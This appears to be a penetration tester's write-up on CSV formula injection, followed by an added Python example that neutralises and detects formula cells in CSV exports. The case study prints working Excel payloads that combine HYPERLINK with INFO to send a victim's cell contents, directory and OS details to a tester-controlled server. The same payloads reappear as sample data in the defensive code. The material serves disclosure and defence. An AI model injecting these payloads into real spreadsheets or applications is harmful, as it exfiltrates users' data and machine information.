CSV Injection, can you show me the impact?
From OWASP
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files. When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.
There are many good articles and talks about this attack, such as:
- NULLCON : Keynote Day 2 | Hunting Evasive Vulnerabilities: Finding Flaws That Others Miss by James Kettle
- Veracode : Data Extraction to Command Execution CSV Injection
- Payatu : CSV Injection – A Guide To Protecting Your CSV Files
- BishopFox : Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution
We were recently contacted by one of our customers who asked us to demonstrate further impacts of this vulnerability. It is widely known that this issue is generally classified as Low to Medium risk due to the level of protection provided by Microsoft Excel (and other spreadsheet software) as well as the requirement that users are tricked into clicking the embedded link. Additionally, even though spreadsheet content can be exfiltrated to a controlled server, the impact will depend on the type of data that is exfiltrated.
Our team explored Excel functions that could be used to demonstrate a greater impact. In this article, we share one approach that we found.
Case study
The vulnerable feature in the application we tested accepted user input, and the submitted content could be downloaded as a CSV file. When viewed in MS Excel, the downloaded CSV file looked similar to the screenshot below:
Commonly, we use the following proof-of-concept (POC), which demonstrates that it is possible to exfiltrate the contents of other cells to our controlled server.
=HYPERLINK("https://url.oast.fun?exfil="&B1&B2&B3&B4,"Error!")
When the victim clicks the link, it will send the information to our controlled server.
However, in this case, the customer felt the POC was not impactful enough to present to their management team, because the data an attacker could exfiltrate was not confidential at all.
This is when we found that there is an Excel function, INFO(). As an example, we could find out the victim’s operating system by using INFO("osversion"), and the result is displayed in the Excel cell.
By utilising HYPERLINK() together with INFO(), we could exfiltrate the victim’s local machine information to our controlled server.
We injected the vulnerable forms with the following payload:
=INFO("directory")
=CONCAT(INFO("osversion"),INFO("system"),INFO("release"))
=HYPERLINK("https://url.oast.fun?exfil="&B8&B9,"FOOYAHHHH!!")
As a result, the imported CSV file looked similar to this:
We inserted the HYPERLINK() payload on another row and pointed it at the cells we wanted to exfiltrate. When a victim opened the file, INFO() displayed their local machine information, and when the FOOYAHHHH!! link was clicked, that information was sent to our controlled server.
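As an added example (not code from the original post or from the application we tested), the following Python shows the defensive counterpart to the case study: an export routine that neutralises cells beginning with the characters spreadsheet software treats as formula triggers, and a scanner that flags such cells in an existing CSV export. The payloads above are embedded as constructed sample input; the function names, the sample rows and the naive "unsafe" writer are my own assumptions, not the vulnerable application's code.

```python
"""
Neutralising CSV/formula injection on export, and detecting it in an
existing export. Added example; not part of the original write-up.

A spreadsheet treats a cell as a formula when it starts with '=', '+',
'-' or '@'; leading tab and carriage return are also commonly treated as
triggers, so they are included. The standard mitigation is to prefix such
cells with a single quote so the content is stored as text, and to quote
every field so an embedded quote or comma cannot break out of the cell.
"""
import csv
import io

FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value: str) -> bool:
    """True if a spreadsheet would interpret this cell text as a formula."""
    return value.startswith(FORMULA_TRIGGERS)


def neutralise_cell(value) -> str:
    """Render one cell as inert text for a CSV export.

    Numbers (int/float) pass through unchanged so numeric columns stay
    numeric. Strings that begin with a trigger character get a leading
    single quote. csv.writer doubles embedded double quotes for us.
    """
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    text = str(value)
    return "'" + text if is_formula_like(text) else text


def _write_csv(rows, cell_fn) -> str:
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([cell_fn(c) for c in row])
    return buf.getvalue()


def write_unsafe_csv(rows) -> str:
    """Naive export: user values written verbatim (the vulnerable pattern)."""
    return _write_csv(rows, str)


def write_safe_csv(rows) -> str:
    """Hardened export: every cell passed through neutralise_cell()."""
    return _write_csv(rows, neutralise_cell)


def find_formula_cells(csv_text: str):
    """Scan a CSV export and return (row, col, value) for every cell that
    would execute as a formula. Useful as a check on exports produced by
    code you do not control, or as a regression test for your own."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


# Constructed sample: a user-supplied "comment" column carrying the three
# payloads from the write-up, a negative number typed as text, and an
# '@'-prefixed string. The id column is numeric and must stay numeric.
SAMPLE_ROWS = [
    ["id", "comment"],
    [1, "hello"],
    [2, '=INFO("directory")'],
    [3, '=CONCAT(INFO("osversion"),INFO("system"),INFO("release"))'],
    [4, '=HYPERLINK("https://url.oast.fun?exfil="&B8&B9,"FOOYAHHHH!!")'],
    [5, "-42"],
    [6, "@channel"],
]

if __name__ == "__main__":
    unsafe = write_unsafe_csv(SAMPLE_ROWS)
    for r, c, cell in find_formula_cells(unsafe):
        print(f"unsafe export: row {r} col {c} would run as a formula: {cell}")
    safe = write_safe_csv(SAMPLE_ROWS)
    print("safe export findings:", find_formula_cells(safe))
    print(safe)
```

The scanner deliberately flags "-42" as well: a leading minus in a text field is indistinguishable from a formula trigger, so the export side should emit genuine numbers as numeric types (left untouched by neutralise_cell) rather than as strings, which is why the id column survives unquoted-by-apostrophe while the user-typed "-42" does not.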
Reference: https://support.microsoft.com/en-us/office/info-function-725f259a-0e4b-49b3-8b52-58815c69acae
Thank you